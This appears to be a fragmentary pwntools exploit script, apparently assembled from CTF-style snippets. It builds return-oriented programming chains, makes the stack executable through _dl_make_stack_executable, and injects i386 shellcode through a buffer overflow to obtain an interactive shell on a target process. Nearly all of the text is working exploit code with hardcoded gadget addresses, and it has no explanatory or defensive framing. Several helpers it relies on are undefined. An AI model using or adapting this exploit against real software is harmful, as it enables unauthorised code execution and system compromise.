def build_payload() -> bytes:
rop = ROP(BINARY_PATH)
for binary_function in BINARY_FUNCTIONS:
rop.call(binary_function)
rop.raw(LAST_ROP_ADDRESS)
payload = b'4\n'
payload += b'A' * 120
payload += bytes(rop) + b'\n'
return payload
def setRegisters(elf, registers):
from pwn import ROP
rop = ROP(elf)
for t in rop.setRegisters(registers):
value = t[0]
gadget = t[1]
if type(gadget) == pwnlib.rop.gadgets.Gadget:
rop.raw(gadget.address)
for reg in gadget.regs:
if reg in registers:
rop.raw(registers[reg])
else:
rop.raw(0)
return rop
def main():
elf = ExploitInfo.elf
addr___libc_stack_end = elf.sym['__libc_stack_end']
addr___stack_prot = elf.sym['__stack_prot']
MEM_PROT_FLAG = constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC
POP_EAX_RET = 0x80b81c6
POP_EBX_RET = 0x80481c9
POP_ECX_RET = 0x80de955
POP_EDX_RET = 0x806f02a
XOR_EAX_EAX_RET = 0x8049303
INC_EAX_RET = 0x807a86f
MOV_DWORD_EDX_EAX_RET = 0x80549db
POP_ESI_RET = 0x8048433
POP_EDI_RET = 0x8048480
INT_80 = 0x806cc25
PUSH_ESP_RET = 0x080b81d6
rop = ROP(elf)
rop.raw(POP_EDX_RET)
rop.raw(addr___stack_prot) # edx = &__stack_prot
rop.raw(XOR_EAX_EAX_RET)
for x in range(MEM_PROT_FLAG): # eax = MEM_PROT_FLAG
rop.raw(INC_EAX_RET)
rop.raw(MOV_DWORD_EDX_EAX_RET) # __stack_prot = MEM_PROT_FLAG
rop.raw(POP_EAX_RET) #
rop.raw(addr___libc_stack_end) # eax = &__libc_stack_end
rop.call('_dl_make_stack_executable'
) # _dl_make_stack_executable(&__libc_stack_end)
rop.raw(PUSH_ESP_RET)
p = get_process()
payload = 'A' * ExploitInfo.offset_eip
payload += rop.chain()
payload += ExploitInfo.shellcode_i386
assert ('\x00' not in payload)
p.clean()
log.info("Sending: %r", payload)
p.sendline(payload)
p.clean(timeout=0.5)
p.clean(timeout=0.5)
log.success("Here are your shell!")
p.sendline('ls -la')
p.interactive()
p.close()